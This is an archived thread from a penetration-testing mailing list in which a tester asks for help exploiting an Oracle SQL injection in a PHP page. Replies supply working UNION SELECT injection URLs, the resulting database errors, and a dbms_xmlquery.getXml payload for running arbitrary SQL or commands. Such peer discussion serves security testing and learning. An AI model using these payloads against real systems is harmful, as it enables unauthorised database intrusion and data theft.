Penetration Testing mailing list archives

Re: Oracle URL SQL Injection issue

From: Cesar <cesarc56 () yahoo com>
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST)

Hi

I would recommend first trying to get the source code
if possible : http://x.y.z.a/dbs.inc but I guess it
won't work it should be a secure web server :)

Anyways depending on the Oracle version you can easily
own it, you just need to inject a function and exploit
some known sql injection in Oracle or depending on
permissions you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your
favority sql injection exploit here or any command'))

Look at : 
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip


Cesar.
--- Clone <c70n3 () yahoo co in> wrote:

Thanks Jeff & everyone.

I've moved further after your emails. Really much
appreciated.

With Jeff's input below I enumerate that there are 2
columns. 

This time I gave

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr


Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44

The I tried following:

http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr


And get the error

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an
email
page/forum email page.

Any idea what's next?



--- jeffrey rivero <jeffr76 () yahoo com> wrote:

Hello all
in your Union start by finding out how many

columns

there are
ie.

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--

would give you 3 columns

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--

would give you 4
then once you have that
get the data types

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--

for the first to be a string
and so on
then you can start to get real data from the

tables

or

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--


Jeff

Clone wrote:

Hey List

I am pen testing a web app that supplies sql
parameters on the URL something like

http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to

confirm

the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90&apos;

I get 

ociparse() [function.ociparse]: OCIParse:

ORA-01756:

quoted string not properly terminated in

item.php

on

line 312

Then I tried (after confirming presence of usr

table

name)

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--


and I get the error

ociexecute() [function.ociexecute]:

OCIStmtExecute:

ORA-01789: query block has incorrect number of

result

columns in dbs.inc on line 44

I know one valid user account in the oracle DB.

Any idea what's the best strategy to move

forward?


I'm not getting any further from here so far.

Any advise / helpo would be much appreciated.

Cheers'



      5, 50, 500, 5000 - Store N number of mails

in your inbox. Go to

http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html

------------------------------------------------------------------------

This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution

FREE today!


http://www.cenzic.com/downloads

------------------------------------------------------------------------




      Chat on a cool, new interface. No download
required. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php

------------------------------------------------------------------------

This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE
today!

http://www.cenzic.com/downloads

------------------------------------------------------------------------




      ____________________________________________________________________________________
Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

Current thread:

Oracle URL SQL Injection issue Clone (Jan 18)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)
  - Re: Oracle URL SQL Injection issue Clone (Jan 22)
    - Re: Oracle URL SQL Injection issue Cesar (Jan 23)
- Re: Oracle URL SQL Injection issue Jason Thompson (Jan 22)
- Re: Oracle URL SQL Injection issue Francois Larouche (Jan 22)
- Re: Oracle URL SQL Injection issue Danux (Jan 22)
- RE: Oracle URL SQL Injection issue Thakrar, Saurabh (Jan 22)
  - Re: Oracle URL SQL Injection issue David Howe (Jan 23)
- Re: Oracle URL SQL Injection issue Joe Yong (Jan 22)
  - Re: Oracle URL SQL Injection issue Clone (Jan 22)
    - Re: Oracle URL SQL Injection issue Joxean Koret (Jan 23)
- Re: Oracle URL SQL Injection issue Todd Manning (Jan 22)
- <Possible follow-ups>
- Re: Oracle URL SQL Injection issue Clone (Jan 23)